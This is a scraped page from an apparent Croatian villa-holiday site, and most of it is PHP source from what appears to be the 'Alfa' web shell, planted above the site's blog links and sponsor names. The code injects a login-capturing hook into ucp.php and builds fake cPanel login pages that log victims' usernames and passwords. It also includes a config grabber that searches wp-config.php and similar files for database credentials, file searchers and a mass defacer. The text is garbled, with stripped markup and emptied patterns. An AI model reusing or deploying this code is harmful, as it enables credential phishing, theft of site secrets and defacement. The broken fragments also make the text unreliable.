\'login\':'; $code=str_replace('{saveto_path}',$saveto,$code); $login=$path."/ucp.php"; $evil_login = "\t".$find."\n\t".$code; if(@is_file($login) AND @is_writable($login)){ $data_login = @file_get_contents($login); if(strstr($data_login, $find)){ $login_replace = str_replace($find,$evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0,$saveto); }else{ hijackOutput(1); } }else{ hijackOutput(1); } } function hijackOutput($c=0,$p=''){echo($c==0?"Success --> path: $p":'Error in inject code !');} function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){ if(@is_dir($dir)){ $files=@scandir($dir); foreach($files as $key => $value){ $path=@realpath($dir. DIRECTORY_SEPARATOR .$value); if(!@is_dir($path)){ if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;} if($e=='str'){ $content = @file_get_contents($path); if(strpos($content, $string) !== false){ echo str_replace('\\','/',$path) . "
"; } }else{ if(strstr($value,$string)){ echo str_replace('\\','/',$path) . "
"; } } $results[] = $path; }elseif($value != "." && $value != "..") { Alfa_StrSearcher($path,$string,$ext,$e,$results); $results[] = $path; }}}} function alfafakepage(){ alfahead(); AlfaNum(9,10); echo '

| Host Manager Fake page |


Panel:
"); echo '
Clone page:
Fake page root:
Inject to:
Bind on:
Log To:
Count of Invalid login:

'; $clone_page = $_POST['alfa1']; $fake_root = $_POST['alfa2']; $logto = $_POST['alfa4']; $panel = $_POST['alfa5']; $inject_to = $_POST['alfa6']; $bind_on = $_POST['alfa7']; $count = $_POST['alfa8']; if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){ echo __pre(); $target = $clone_page; $curl = new AlfaCURL(); $source_page = $curl->Send($target); if(!empty($source_page)){ $matched_form = ""; if($panel == "cpanel"){ if(preg_match('##', $source_page, $match)){ $matched_form = $match[0]; } }else{ if(preg_match('##', $source_page, $match)){ $matched_form = $match[0]; } } if(!empty($matched_form)){ $fake = ""; $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root); $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to); if($panel == "cpanel"){ $port = "2083"; }else{ $target = str_replace(array("http://", "https://"), "", $target); $port = explode(":",$target); $port = $port[1]; } if(substr($uri, 0, 1) == "/"){ $uri = substr($uri, 1); } $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port; $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php'; if($panel == "cpanel"){ $form = '
'; }else{ $form = ''; } $fake = str_replace($matched_form, $form, $source_page); if(@!is_dir($fake_root)){ @mkdir($fake_root, 0777, true); } $cookie_name = "alfa_fakepage_counter" . rand(9999,99999); $post_user = 'user'; $post_pass = 'pass'; $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}'; if($panel != "cpanel"){ $post_user = 'username'; $post_pass = 'password'; $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);'; } $cpanel_log = ' '.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>'; @file_put_contents($fake_root.'/log.php', $cpanel_log); if($panel == "cpanel"){ $fake = preg_replace(array('##', '##', '# #'), array(' ', '', ''), $fake); } @file_put_contents($fake_root.'/index.php', $fake); $inject_code = ''; $bind_on_code = ''; @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to)); @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on)); echo "success...!"; }else{ echo "failed...!"; } }else{ echo("
Cannot open the target...!
"); } } echo '
'; alfafooter(); } function alfaarchive_manager(){ alfahead(); $file = $_POST['alfa2']; if(!file_exists($file)){ $file = $GLOBALS['cwd']; } $rand_id = rand(9999, 999999); echo '


| Archive Manager |


'; echo '
Archive file:

'; if($_POST['alfa5']=='>>'){ //echo __pre(); echo '
'; echo '
'; __alfa_open_archive_file($file, $rand_id); echo '
'; } echo '
'; alfafooter(); } function __alfa_open_archive_file($arch, $base_id=0){ try{ $files = array(); $dirs = array(); $archive = new PharData($arch); foreach($archive as $file) { $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname())); if($file->isDir()) { $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify); }else{ $file_size = @filesize($file->getPathname()); $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size); } } function __alfa_open_archive_usort($a, $b){ return strcmp(strtolower($a['name']), strtolower($b['name']))*1; } usort($dirs, "__alfa_open_archive_usort"); usort($files, "__alfa_open_archive_usort"); $files = array_merge($dirs, $files); echo ''; $icon = ''; echo ''; foreach($files as $file){ $icon = ''; if($file["type"] == "dir"){ echo ''; }else{ echo ""; } } echo '
Name Size Modify Actions
'.$icon.'| .. | dir - -
'.$icon.'| '.$file["name"].' | dir '.$file["modify"].' -
".$icon."".$file["name"]." ".alfaSize($file["size"])." ".$file["modify"]." -
'; }catch(Exception $e){ echo("0"); } } function alfaopen_archive_dir(){ $dir = $_POST["alfa1"]; $base_id = $_POST["alfa2"]; __alfa_open_archive_file($dir, $base_id); } function alfaconfig_grabber(){ alfahead(); echo '


| Config Grabber |


'; echo '
Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $ext = $_POST['alfa3']; if($_POST['alfa5']=='>>'){ echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo '
'; alfafooter(); } function Alfa_ConfigGrabber($dir, $ext) { $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i"; $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php"); if(@is_readable($dir)){ $globFiles = @glob("$dir/*.$ext"); $globDirs = @glob("$dir/*", GLOB_ONLYDIR); $blacklist = array(); foreach ($globDirs as $dir) { if(!@is_readable($dir)||@is_link($dir)) continue; @Alfa_ConfigGrabber($dir, $ext); } foreach ($globFiles as $file){ $filee = @file_get_contents($file); if(preg_match($pattern, $filee)){ echo " "; } } } } function alfasearcher(){ alfahead(); echo '


| Searcher |


| Find Readable Or Writable Files | | Find Files By Name |

'; if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){ echo '
| Find Readable Or Writable Files |


Method: Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $ext = $_POST['alfa3']; $method = $_POST['alfa4']; if($_POST['alfa5']=='>>'){ echo __pre(); if(substr($dir,-1)=='/')$dir=substr($dir,0,-1); Alfa_Searcher($dir,trim($ext),$method); } } if($_POST['alfa1']=='str'){ echo '
| Find Files By Name / Find String In Files |


Method: String: Dir: Ext: [ * = all Ext ]

'; $dir = $_POST['alfa2']; $string = $_POST['alfa3']; $ext = $_POST['alfa5']; if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){ echo __pre(); Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']); } } echo '
'; alfafooter(); } function alfaMassDefacer(){ alfahead(); AlfaNum(5,6,7,8,9,10); echo "


| Mass Defacer |


>');return false;\" method='post'>"; echo '
Deface Method: Mass dir: DefPage:


More Posts

Can you imagine that there is an island where the stone is considered to be a treasure? An island that has a cave that hides a dragon, and whose hard-to-reach terrain is home to an impressive monastery built among rocks?
Brac Island: Places Not to Miss on Your Hidden Croatia Holidays
Brac Island: Places Not to Miss on Your Hidden Croatia Holidays
If you decided to visit Brac, you are not going to regret it. Contrary, you are going to be pleasantly surprised by its size, nature, history, gastronomy, and everything else. There are so many things to do on Brac Islan...
Things to Do on the Brac Island
Things to Do on the Brac Island
To save you time on research for the most instagrammable places, we will suggest the best places to visit in Croatia where no photo can turn out badly!
The Most Instagrammable Places - Best Places to Visit in Croatia
The Most Instagrammable Places - Best Places to Visit in Croatia
Croatia is famous for its beautiful beaches and crystal clear sea, something that is not to be missed on your villa holiday. Read about our favorite Croatian beaches now.
The Best Croatia Beaches for Your Croatian Adventure
The Best Croatia Beaches for Your Croatian Adventure
Whether enjoying a Croatia island hopping tour or settling down for a luxury villa holiday, Makarska is a destination that should be on your list. Read now to find out why.
Croatia Island Hopping – What To Do in Makarska?
Croatia Island Hopping – What To Do in Makarska?
Check out why Makarska is a must while visiting Croatia. Suppose you are a fan of an active holiday - you can choose between many activities like rafting, canyoning, boat excursions hiking... or just working on your tan...
Things to do in Makarska - the ultimate guide
Things to do in Makarska - the ultimate guide
Check out our list of reasons why long-term villa rental in Croatia is the thing you might need now. Stay with us and find out more!
6 Reasons Why Long-Term Vacation Rentals in Croatia are a Good Idea
6 Reasons Why Long-Term Vacation Rentals in Croatia are a Good Idea
Although December and the Christmas period may not traditionally be the most popular time to visit Croatia, the bustling Christmas markets and authentic Christmas traditions draw in tourists who are looking for a Europea...
Christmas in Croatia
Christmas in Croatia
Villas offer privacy, tranquillity, and the utmost comfort. Read our top tips on how to choose the perfect Croatian villa for you.
How to Choose the Perfect Villa in Croatia
How to Choose the Perfect Villa in Croatia
Sibenik is a historical city in the middle of Dalmatia in Croatia. Mediterranean climate assures perfect weather conditions throughout the whole year. Here is our proposal for what to do in Sibenik.
What to Do in Sibenik in Croatia?
What to Do in Sibenik in Croatia?
Orbico
ASTA
HTZ
UHPA